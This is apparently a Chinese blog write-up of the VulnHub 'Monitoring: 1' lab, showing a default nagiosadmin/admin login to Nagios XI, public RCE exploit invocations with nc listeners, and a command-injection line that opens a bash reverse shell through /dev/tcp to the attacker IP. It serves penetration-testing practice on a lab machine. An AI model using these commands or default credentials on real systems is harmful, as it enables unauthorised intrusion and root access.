vulnhub Monitoring: 1

最新推荐文章于 2024-02-05 20:58:50 发布
原创 最新推荐文章于 2024-02-05 20:58:50 发布 · 1.3k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #Nagios XI #rce

渗透思路:

nmap扫描 ---- 默认用户名+弱密码登录Nagios XI ---- 利用Nagios XI 5.6.5的RCE漏洞获得root的shell

环境信息:

靶机:192.168.101.84

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.84

扫描到端口22、25、80、389、443、5667

2、默认用户名+弱密码登录Nagios XI

浏览器访问http://192.168.101.84/,发现是Nagios XI。

点击上图中的Access Nagios XI按钮,来到登录页面http://192.168.101.84/nagiosxi/login.php?redirect=/nagiosxi/index.php%3f&noauth=1

在网上查到Nagios XI的默认用户是nagiosadmin,尝试使用该用户和常见弱密码登录,发现该用户的密码是弱密码admin

成功登录后,发现Nagios XI版本是Nagios XI 5.6.0

3、利用Nagios XI的RCE漏洞getshell(可以省略)

exploit-db上查找Nagios XI,找到exp:Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated) - PHP webapps Exploit

下载exp,并根据exp中的用法提示在攻击机上执行:

nc -nlvp 8888
python3 49422.py http://192.168.101.84 nagiosadmin admin 192.168.101.34 8888

即可在攻击机nc监听端口上获得靶机www-data用户的反弹shell

4、利用Nagios XI 5.6.5的RCE漏洞获得root的shell

靶机上执行sudo -l发现www-data可以在不输入密码的情况下以root身份执行8条命令,其中有4条和Nagios XI相关,另外4条用ls -al命令观察后发现当前用户都没有写权限,所以很可能提权还是和Nagios XI有关。

google上搜索“nagios xi privilege escalation”

首先在[R2] Nagios XI Multiple Vulnerabilities - Research Advisory | Tenable®查找到一个proof:

sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp/192.168.101.34/4444 0>&1;'

尝试之后发现不好使,可能这个漏洞在靶机的版本上已经修复了。

然后又查找到和/usr/local/nagiosxi/html/includes/components/profile/getprofile.sh相关的一个exp:

Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation - PHP webapps Exploit

这个exp真是能用而不好用,愁死我了-_-|||

用法是,攻击机上nc监听某个端口,比如8888

然后执行:

php 47299.php --host=192.168.101.84 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.101.34 --reverseport=8888

我在执行过程中总共遇到3个问题

1、Call to undefined function curl_init()

2、cookie.txt already exists - delete prior to running

3、PHP Fatal error: Uncaught Error: Class "DOMDocument" not found in /home/kali/47299.php:51

解决方法分别如下:

问题一:

sudo apt-get install php-curl

问题二:

注释掉exp中函数checkCookie()相关代码

问题三:

sudo apt-get install php-dom

成功执行exp后,攻击机nc监听端口获得靶机root用户反弹shell,并在/root下找到proof.txt

vulnhub靶场,Monitoring
kukudeshuo的博客
07-22 641
vulnhub靶场,Monitoring 环境准备 靶机下载地址:https://www.vulnhub.com/entry/monitoring-1,555/ 攻击机:kali(192.168.109.128) 靶机:Monitoring192.168.109.139) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.139 使用nmap扫描查看目
vulnhubMonitoring(完整复现过程)
鲨鱼辣椒的博客
06-15 1269
目录 信息搜集 扫描网段 扫描端口 扫描网站目录 查看网页 找到漏洞 看到登录页面尝试爆破 爆破出密码,尝试登录后台 getshell 后台行不通,还是回到搭建平台上 找到一个版本对应的脚本 getshell失败,扩大搜索范围。尝试多个脚本 找到正确脚本,设置选项 getshell 顺利拿到flag 信息搜集 扫描网段 扫描端口 nmap -A -P- 192.168.179.140 扫描网站目录 mul 目录没有扫出什么有价值的东西。 查看网页.
MONITORING: 1靶机
小小猪的博客
06-29 358
MONITORING: 1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.132 扫描端口 打开80端口,发现时nagios框架 搜索nagios框架 利用msf 查看设置选项 发现用户名 尝试密码为admin登,登录成功 设置参数 获得shell 进入交互模式,发现是root权限 进入root目录查看flag ...
看完这篇 教你玩转渗透测试靶机vulnhub——Monitoring
Aluxian_的博客
02-05 1555
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。这个靶机很简单都不需要提权就学习了一个msf模块的使用(希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
vulnhub MONITORING: 1 记录
qq_45826388的博客
09-17 438
靶机ip 192.168.34.155 nmap 扫描 访问页面 搜索nagios框架 利用msf 查看设置选项 发现USERNAME 测试密码为admin,登录成功 运行 查看权限
VulnHub系列』serial: 2-Walkthrough
ins1ght的博客
11-10 2133
靶机发布日期:2019年9月27日,难度:中等++。用到了apk逆向和ELF中的ROP技术,web狗(小白)表示伤不起,一路硬刚下来的,求鼓励~
Insanity:1(Insanity-Hosting)靶机渗透 —Vulnhub
m0_68117643的博客
07-14 1014
这台靶机(Insanity: 1)给出的迷惑性信息太多了,谁成想入口竟然是SQL注入。 关键突破点:登录密码爆破、SQL注入获取Mysql用户名密码、密码破解、读取Firefox缓存文件。
Vulnhub-THE PLANETS: VENUS渗透
laoyanCZ的博客
02-05 1277
Vulnhub:THE PLANETS: VENUS ( The Planets: Venus ) 渗透测试由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
ssh: connect to host 192.168.101.34 port 22: Connection timed out
热门推荐
longcheng217的博客
04-01 1万+
背景: 使用 Cygwin64 登录虚拟机时发现无法远程登录虚拟机中Ubuntu系统(之前可以): $ ssh lc@192.168.101.34 ssh: connect to host 192.168.101.34 port 22: Connection timed out 解决步骤: 1. 查看是否开启了ssh服务 发现 ssh服务已经开启 2. 在PC端ping 虚拟机 C:\Use...
Nagios监控搭建与配置详细步骤
weixin_33726943的博客
11-06 276
(一)安装NagiosNagios服务器为:192.168.6.6 Nagios客户端为: 192.168.2.33)1.基础支持套件:gcc glibc glibc-common gd gd-devel xinetd openssl-devel httpd php 注:php和httpd均用源码包安装,安装配置方法此处不在详述# yum install -...
透过 Nagios 持续监控网络及服务器(上)
donaldsebleung的博客
01-20 575
本文章探讨如何安装 Nagios Core 网络与节点监控工具,并提升管理界面的安全性
VulnHub----DC1靶场记录
x1871329637的博客
04-26 3699
00-环境介绍 靶机下载地址:DC: 1 ~ VulnHub 攻击机:kali2022:192.168.200.129 DC1:192.168.200.135 目标:拿到5个flag 1由于这是一次黑盒测试所以只能根据目标mac地址来确认靶机的ip信息 由此判定靶机ip为192.168.200.135 2nmap直接扫 nmap -A 192.168.200.135 -p 1-65535 由此可见开放了22 80 111 42892端口,可以先去访问一下80端口 .
JavaMelody组件XXE漏洞解析
u010046887的专栏
11-28 1694
转载:https://www.codercto.com/a/27038.html 0x00 概述 JavaMelody 是一个用来对 Java 应用进行监控的组件。通过该组件,用户可以对内存、 CPU 、用户 session 甚至 SQL 请求等进行监控,并且该组件提供了一个可视化界面给用户使用。 最近,该组件被爆出一个 XXE 漏洞—— CVE-2018-15531 ,由于该组件的启动特性...
nagios重新设置web口令
lenchio的专栏
01-18 2026
nagios安装过程中会要求输入nagios web访问界面的账号口令 默认账号为nagiosadmin,但是过段时间如果忘记口令该怎么办? 别急。 以ubuntu为例,apt-get安装nagios的话,nagios web界面的账号口令存储在/etc/nagios3/htpasswd.users $ cat /etc/nagios3/htpasswd.users nagiosadmi
PG::Monitoring
aya3t的博客
11-28 226
PROVING GROUNDS::Monitoring
vulnhub Funbox: Under Construction
箭雨镜屋
05-28 669
渗透思路:nmap扫描端口----dirb扫描网站目录----利用osCommerce v2.3.4.1rce漏洞getshell----pspy64s发现定时任务----信息泄漏获得root密码----su输入密码提权
nagios安装配置
chengxuyuanyonghu的专栏
02-20 930
服务器端安装  1. 查看安装服务器环境(LAMP)  2. #rpm -qa | grep httpd  3. #rpm -qa | grep php  4. 没有的话安装  5. # yum -y install gcc glibc glibc-common gd gd-devel php openssl-devel httpd  6. 创建用户: 
nagios部署记录
shaoqiu.wu的博客
05-23 542
访问这个地址 http://IP地址/pnp4nagios 默认用户密码都是nagiosadmin。登录 http://IP地址/nagios/ 默认用户密码都是nagiosadmin。登录 http://IP地址/nagios/ 主页面也有图形标识。
Vulnhub系列】Mr.root
大方子
12-05 3441
靶机下载地址:https://download.vulnhub.com/mrrobot/mrRobot.ova.torrent 这次靶机的名称是Mr.root kali:192.168.100.8 Win7:192.168.100.9 ==============================================================================...
3751:20251212:164110.534 ****** Enabled features ****** 3751:20251212:164110.534 SNMP monitoring: YES 3751:20251212:164110.534 IPMI monitoring: YES 3751:20251212:164110.534 Web monitoring: YES 3751:20251212:164110.535 VMware monitoring: YES 3751:20251212:164110.535 SMTP authentication: YES 3751:20251212:164110.535 ODBC: NO 3751:20251212:164110.535 SSH support: YES 3751:20251212:164110.535 IPv6 support: NO 3751:20251212:164110.535 TLS support: YES 3751:20251212:164110.535 ****************************** 详细解释每一行
最新发布
12-13
### 第一行 ```plaintext 3751:20251212:164110.534 ****** Enabled features ****** ``` - `3751`:通常是进程ID,用于标识正在运行该程序的特定进程。 - `20251212:164110.534`:这是一个时间戳,格式可能是自定义的,推测`20251212`代表日期(2025年12月12日),`164110.534`代表时间(16时4110.534秒)。 - `****** Enabled features ******`:这是一个提示信息,表明接下来要列出系统中已启用的功能。 ### 后续各行 ```plaintext 3751:20251212:164110.534 SNMP monitoring: YES ``` - 同样,`3751`是进程ID,`20251212:164110.534`是时间戳。 - `SNMP monitoring`:表示简单网络管理协议监控功能。SNMP监控原理是通过SNMP协议查询网络设备上的MIB(管理信息库),设备运行SNMP代理,Prometheus通过SNMP Exporter轮询这些设备,SNMP Exporter会翻译SNMP协议的数据为Prometheus的时间序列格式,供Prometheus采集和存储 [^1]。 - `YES`:表明SNMP监控功能已启用。 ```plaintext 3751:20251212:164110.534 IPMI monitoring: YES ``` - `IPMI monitoring`:智能平台管理接口监控功能,可用于服务器的带外管理,在zabbix 4.0上可使用该方式监控IBM X3650 M3服务器等 [^3]。 - `YES`:表示IPMI监控功能已启用。 ```plaintext 3751:20251212:164110.534 Web monitoring: YES ``` - `Web monitoring`:Web监控功能,用于监控Web服务的状态、性能等。 - `YES`:说明Web监控功能已启用。 ```plaintext 3751:20251212:164110.535 VMware monitoring: YES ``` - `VMware monitoring`:VMware监控功能,用于监控VMware虚拟机环境的运行状态等。 - `YES`:意味着VMware监控功能已启用。 ```plaintext 3751:20251212:164110.535 SMTP authentication: YES ``` - `SMTP authentication`:简单邮件传输协议认证功能,用于在发送邮件时进行身份验证。 - `YES`:表示SMTP认证功能已启用。 ```plaintext 3751:20251212:164110.535 ODBC: NO ``` - `ODBC`:开放数据库连接,是一种用于访问数据库的标准接口。 - `NO`:说明ODBC功能未启用。 ```plaintext 3751:20251212:164110.535 SSH support: YES ``` - `SSH support`:安全外壳协议支持,用于安全地远程登录和管理系统。 - `YES`:表示SSH支持功能已启用。 ```plaintext 3751:20251212:164110.535 IPv6 support: NO ``` - `IPv6 support`:IPv6支持功能,用于支持IPv6网络协议。 - `NO`:说明IPv6支持功能未启用。 ```plaintext 3751:20251212:164110.535 TLS support: YES ``` - `TLS support`:传输层安全协议支持,用于在网络通信中提供加密和身份验证。 - `YES`:表示TLS支持功能已启用。 ```plaintext 3751:20251212:164110.535 ****************************** ``` - 这是一个分隔符,用于结束已启用功能的列表显示。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值